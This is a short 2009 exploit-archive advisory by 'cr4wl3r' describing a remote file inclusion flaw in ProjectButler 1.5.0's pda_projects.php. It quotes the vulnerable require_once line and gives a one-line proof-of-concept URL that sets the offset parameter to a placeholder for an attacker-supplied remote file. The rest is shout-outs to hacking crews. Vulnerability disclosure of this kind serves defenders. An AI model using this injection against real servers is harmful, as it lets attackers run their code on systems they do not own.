[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ProjectButler 1.5.0 (pda_projects.php offset) RFI Vulnerability
# Published : 2009-08-03
# Author : cr4wl3r
# Previous Title : AW BannerAd (Auth Bypass) SQL Injection Vulnerability
# Next Title : Ajax Short URL Script (Auth Bypass) SQL Injection Vulnerability


#projectbutler - 1.5.0 (offset) RFI Vulnerability

#Author: cr4wl3r

#Contact: cr4wl3r[4t]linuxmail[dot]org

#Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz

#Vuln : require_once($offset."class.project.inc");

#PoC :

http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea]

#Greetz : MyMom [alm]

#Special To : |CyberSufi| |CyberPeaCe| |AgenR@t| |Ea.ngel| |bl4ck.3n91n3| |Hmei7| |Dew0| |Anjas.chu'X| |Ridwan|              

              |Funky_sensey| |zvtral| |Is.bl4nk| |Y0ps.512mb| |Clif| |HaKu Frisca| |All cRew GoRonTaLo UnDeRgounD|
              |SunKetzu AbbaSSia| |iY0ng| |MaTr0| |deviln3t| |RyO| RaIs R0yaS| |Vel!x| |AnaK2 BolMonG| |MarLoN|

# www.Syue.com [2009-08-03]